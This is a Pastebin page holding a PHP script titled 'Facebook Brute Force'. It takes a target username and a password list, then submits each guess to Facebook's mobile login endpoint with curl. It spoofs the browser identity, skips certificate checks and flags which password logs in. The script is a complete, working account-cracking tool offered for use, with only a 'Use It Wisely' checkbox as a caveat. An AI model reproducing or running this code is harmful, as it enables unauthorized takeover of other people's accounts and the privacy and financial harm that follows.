Advertisement
Guest User

Facebook Brute Force

a guest
Jan 18th, 2017
1,767
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.62 KB | None | 0 0
  1. <?php
  2. // ============================= //
  3. # Facebook Brute Force
  4. # Created by Lyonc
  5. # Garuda Security Hacker
  6. # Use On Localhost
  7. // ============================= //
  8.  
  9. error_reporting(0);
  10.  
  11. $user = $_POST['tguser'];
  12. $passlists = $_POST['plists'];
  13.  
  14. echo '<head>
  15. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  16. <title>Facebook Brute Force</title>
  17. </head>
  18. <body>
  19. <center>
  20. ';
  21.  
  22. if(isset($_POST['startbf']) && !empty($user) && !empty($passlists) && isset($_POST['setuju'])){
  23. $listspass = explode("\r\n", $passlists);
  24. foreach($listspass as $pass){
  25. if(logfb(urlencode($user), urlencode($pass))){
  26. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">True</font><br/>'."\n";
  27. }else{
  28. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">False</font><br/>'."\n";
  29. }
  30. }
  31. }else{
  32. echo '<form method="POST">
  33. <b><font size="6" color="indigo">Facebook Brute Force</font></b><br/>
  34. <font color="gray">Better Using Localhost</font><br/>
  35. <b>Target Username</b><br/>
  36. <input type="text" size="40" name="tguser" placeholder="Target Username" value="'.htmlspecialchars($user).'"><br/>
  37. <b>Password Lists</b><br/>
  38. <textarea cols="30" rows="8" name="plists" placeholder="pass1
  39. pass2
  40. pass3">'.htmlspecialchars($passlists).'</textarea><br/>
  41. <input type="checkbox" name="setuju" value="Use It Wisely"><font color="blue">Use It Wisely</font><br/>
  42. <input type="submit" name="startbf" value="START">
  43. </form>
  44. ';
  45. }
  46.  
  47. echo '</center>
  48. </body>';
  49.  
  50. function logfb($login_email, $login_pass){
  51. $cookielog = 'gsh_cookie';
  52. $fp = fopen($cookielog, 'w');
  53. fwrite($fp, '');
  54. fclose($fp);
  55. $ch = curl_init();
  56. curl_setopt($ch, CURLOPT_URL, 'https://m.facebook.com/login.php');
  57. curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$login_email.'&pass='.$login_pass.'&login=Login');
  58. curl_setopt($ch, CURLOPT_POST, 1);
  59. curl_setopt($ch, CURLOPT_HEADER, 0);
  60. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  61. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookielog);
  62. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookielog);
  63. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  64. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  65. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  66. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3');
  67. curl_setopt($ch, CURLOPT_REFERER, 'http://m.facebook.com');
  68. $page = curl_exec($ch) or die('<font color="red">Can\'t Connect to Host</font>');
  69. if(eregi('<title>Facebook</title>', $page) || eregi('id="checkpointSubmitButton"', $page)){
  70. return TRUE;
  71. }else{
  72. return FALSE;
  73. }
  74. }
  75. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement